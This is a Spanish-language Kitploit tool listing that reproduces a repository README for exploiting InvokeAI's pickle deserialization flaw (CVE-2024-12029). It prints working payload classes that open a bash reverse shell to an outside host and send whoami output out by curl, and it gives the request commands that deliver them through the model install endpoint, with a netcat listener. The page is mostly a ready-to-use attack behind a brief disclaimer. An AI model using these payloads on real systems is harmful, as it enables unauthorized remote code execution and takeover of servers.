Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — Este repositorio contiene enfoques de payload alternativos para la vulnerabilidad RCE de InvokeAI (CVE-2024-12029) cuando falla la inyección de clave SSH. Los payloads están diseñados para probar si realmente ocurre la deserialización de pickle y proporcionar métodos de acceso alternativos. | Kitploit
Herramientas/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Ver Repositorio
3hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este repositorio contiene enfoques de payload alternativos para la vulnerabilidad RCE de InvokeAI (CVE-2024-12029) cuando falla la inyección de clave SSH. Los payloads están diseñados para probar si realmente ocurre la deserialización de pickle y proporcionar métodos de acceso alternativos.

Compartir

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Enfoque Alternativo: Prueba de Reverse Shell y Callback

Resumen

Este repositorio contiene enfoques de payload alternativos para la vulnerabilidad RCE de InvokeAI (CVE-2024-12029) cuando falla la inyección de claves SSH. Los payloads están diseñados para comprobar si realmente se está produciendo la deserialización de pickle y proporcionar métodos de acceso alternativos.

Planteamiento del Problema

Cuando los payloads de inyección de claves SSH se entregan correctamente (Estado 201) pero el acceso SSH sigue requiriendo contraseña, indica que:

  1. La deserialización de pickle no se está produciendo
  2. Los comandos están siendo bloqueados/aislados en un sandbox
  3. El método de ejecución es incompatible

Solución: Payloads Alternativos

📁 Archivos de Payload

Payloads de Reverse Shell
  • payload_reverse_bash.ckpt (89 bytes) - Reverse shell en Bash
  • payload_reverse_python.ckpt (267 bytes) - Reverse shell en Python
  • payload_reverse_nc.ckpt (70 bytes) - Reverse shell con Netcat

Payloads de Prueba y Verificación

  • payload_callback_test.ckpt (115 bytes) - Callback HTTP para verificar la deserialización
  • payload_test.ckpt (90 bytes) - Prueba simple de creación de archivos
  • payload_alt_exec.ckpt (223 bytes) - Método de ejecución alternativo

Payloads SSH (para referencia)

  • payload_ssh_simple.ckpt (271 bytes) - Inyección de claves SSH compatible con Linux

🛠️ Scripts de Prueba

Scripts de Prueba para Kali

  • kali_reverse_test.py - Suite de pruebas integral

Generadores de Payloads

  • reverse_shell_payload.py - Genera payloads de reverse shell

🚀 Uso Rápido

1. Iniciar el Servidor de Payloads

root@kitploit:~
python web_server.py --port 8000

2. Probar el Callback (Recomendado Primero)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Probar el Reverse Shell

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Probar la Ejecución Simple

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Interpretación de los Resultados de las Pruebas

✅ Éxito de la Prueba de Callback

  • Qué significa: La deserialización de pickle está funcionando
  • Siguiente paso: Prueba el reverse shell o los payloads SSH alternativos
  • Comprobación: Registros del servidor web para el callback HTTP

✅ Éxito del Reverse Shell

  • Qué significa: Los comandos se ejecutan y el acceso a la red funciona
  • Resultado: Acceso directo a la shell a través del listener de netcat
  • Siguiente paso: Usa el reverse shell para una explotación posterior

✅ Archivo de Prueba Creado

  • Qué significa: La ejecución básica de comandos funciona
  • Siguiente paso: Prueba métodos alternativos de inyección SSH
  • Comprobación: /tmp/payload_test.txt en el objetivo

Payload de Callback

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Payload de Reverse Shell

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Payload de Prueba

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Referencias

  • CVE-2024-12029: Ejecución remota de código en InvokeAI
  • Deserialización insegura de PyTorch: Vulnerabilidad de torch.load()
  • Pickle reduce: Explotación de la serialización de objetos de Python

⚠️ Aviso Legal

Este repositorio es únicamente para fines educativos y de pruebas de seguridad autorizadas. Los usuarios son responsables de asegurarse de contar con la autorización adecuada antes de probar cualquier sistema.

Descargar herramienta